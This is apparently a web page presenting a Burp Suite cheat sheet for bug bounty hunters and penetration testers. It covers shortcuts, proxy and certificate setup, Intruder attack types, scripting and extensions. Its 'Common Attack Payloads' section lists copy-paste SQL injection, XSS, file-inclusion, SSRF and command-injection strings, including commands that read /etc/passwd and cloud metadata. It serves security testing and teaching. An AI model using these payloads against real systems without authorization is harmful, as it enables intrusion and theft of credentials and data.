Burp Suite Cheat Sheet 2026
The ultimate reference guide for bug bounty hunters and penetration testers
Keyboard Shortcuts
Mastering shortcuts is the fastest way to improve your workflow in Burp Suite.
Global Navigation
| Windows / Linux | Mac | Action |
|---|---|---|
| Ctrl + Shift + D | Cmd + Shift + D | Switch to Dashboard |
| Ctrl + Shift + T | Cmd + Shift + T | Switch to Target |
| Ctrl + Shift + P | Cmd + Shift + P | Switch to Proxy |
| Ctrl + Shift + I | Cmd + Shift + I | Switch to Intruder |
| Ctrl + Shift + R | Cmd + Shift + R | Switch to Repeater |
Proxy & Repeater Actions
| Shortcut | Action |
|---|---|
| Ctrl + F | Forward intercepted message |
| Ctrl + D | Drop intercepted message |
| Ctrl + T | Toggle Interception On/Off |
| Ctrl + R | Send to Repeater |
| Ctrl + I | Send to Intruder |
| Ctrl + U | URL Decode |
| Ctrl + Shift + U | URL Encode |
Proxy Configuration & CA Certificate
Getting Burp to intercept traffic correctly is step one. Here is the standard configuration.
Standard Listener Setup
- Interface:
127.0.0.1:8080(Default) - All Interfaces:
0.0.0.0:8080(For mobile testing)
Installing CA Certificate
- Configure your browser to proxy through
127.0.0.1:8080. - Visit
http://burpin that browser. - Click CA Certificate to download
cacert.der. - Firefox: Settings > Privacy & Security > Certificates > View Certificates > Import.
- Chrome/Windows: Double click file > Install Certificate > Trusted Root Certification Authorities.
- Android/iOS: Rename to
cacert.crtand install via Security settings.
Scope Configuration
Always set your scope to avoid attacking unauthorized sites.
Target > Scope > Add > Advanced options - Protocol: Any - Host or IP: ^www\.target\.com$ - File: ^/api/v1/.*
Intruder Attack Types
Choose the right attack type based on how many payload positions you have.
| Type | Description | Use Case |
|---|---|---|
| Sniper | Uses one payload set. Puts payload into each position one by one. | Fuzzing multiple parameters for the same vulnerability (e.g., XSS in all inputs). |
| Battering Ram | Uses one payload set. Puts the SAME payload into ALL positions at once. | Testing username/password fields where user=pass. |
| Pitchfork | Uses multiple payload sets. Iterates them simultaneously (1-1, 2-2, 3-3). | Credential stuffing (User List + Password List). |
| Cluster Bomb | Uses multiple payload sets. Iterates every combination (Cartesian product). | Brute forcing login forms (Try every password for every user). |
Common Attack Payloads
Copy and paste these directly into Intruder or Repeater.
SQL Injection +
' OR 1=1 --
' UNION SELECT 1,version(),3 --
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) --
admin' --
" OR "1"="1
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+Cross-Site Scripting (XSS) +
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
" onfocus="alert(1)" autofocus="Local File Inclusion (LFI) +
../../../../etc/passwd
....//....//....//etc/passwd
php://filter/convert.base64-encode/resource=index.php
file:///etc/passwd
/proc/self/environ
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswdServer-Side Request Forgery (SSRF) +
http://127.0.0.1:80
http://localhost:22
http://169.254.169.254/latest/meta-data/
dict://127.0.0.1:11211/
file:///etc/passwd
http://[::]:80/Command Injection +
; ls -la
| ls -la
& ls -la
$(ls -la)
`ls -la`
|| ping -c 1 127.0.0.1
; cat /etc/passwdRepeater & Decoder Tricks
Repeater Workflow
- Change Request Method: Right-click body > “Change request method” to swap GET/POST instantly.
- Follow Redirects: Button at top right. Useful for login bypass testing.
- Naming Tabs: Double-click tab headers to rename (e.g., “Login Flow”, “Admin API”) to stay organized.
Smart Decoding
The Inspector panel (right side) in Repeater automatically decodes selected text. You don’t always need to send to the Decoder tab.
Automation & Scripting
Use Python to drive Burp requests when Intruder isn’t enough.
Python Proxy Script
import requests
# Configure requests to use Burp Proxy
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
# Disable SSL warnings for self-signed certs
requests.packages.urllib3.disable_warnings()
target = "http://example.com/api/v1/user"
# Send request through Burp
response = requests.get(target, proxies=proxies, verify=False)
print(f"Status: {response.status_code}")
print(f"Body: {response.text[:100]}...")Burp REST API
If automated scanning is enabled (Pro), you can trigger scans programmatically:
curl -X POST "http://localhost:1337/v0.1/scan" -d '{"urls":["http://target.com"]}'Must-Have BApp Store Extensions
Enhance Burp’s capabilities with these top-rated extensions.
| Extension | Function | Best For |
|---|---|---|
| Logger++ | Advanced logging with robust filters. | Debugging complex flows. |
| Autorize | Automated authorization enforcement detection. | IDOR testing. |
| Turbo Intruder | High-speed HTTP fuzzing via Python scripts. | Rate limit testing, race conditions. |
| Retire.js | Scans for vulnerable JavaScript libraries. | Passive scanning. |
| JSON Web Token (JWT) Editor | Sign, verify, and modify JWTs. | API security testing. |
| Active Scan++ | Adds more checks to the active scanner. | Finding obscure vulnerabilities. |
| Param Miner | Finds hidden, unlinked parameters. | Web cache poisoning. |
Pro Performance Tips
Memory Management
Burp can eat RAM. Edit your launch script to allocate more memory:
java -jar -Xmx4g burpsuite_pro.jarScope Control
Never test without setting a scope. It keeps your history clean and prevents legal issues.
- Target > Scope: Check “Advanced scope control” for regex power.
- Proxy > Options: Check “Don’t send items to Proxy history or live tasks, if out of scope”.
Handling TLS Errors
If a legacy app won’t connect through Burp:
- Go to Project options > SSL.
- Enable “Allow unsafe renegotiation”.
- Under “SSL Negotiation Workarounds”, try adding the specific host.
One thought on “Burp Suite Cheat Sheet – Essential Web Security Tips”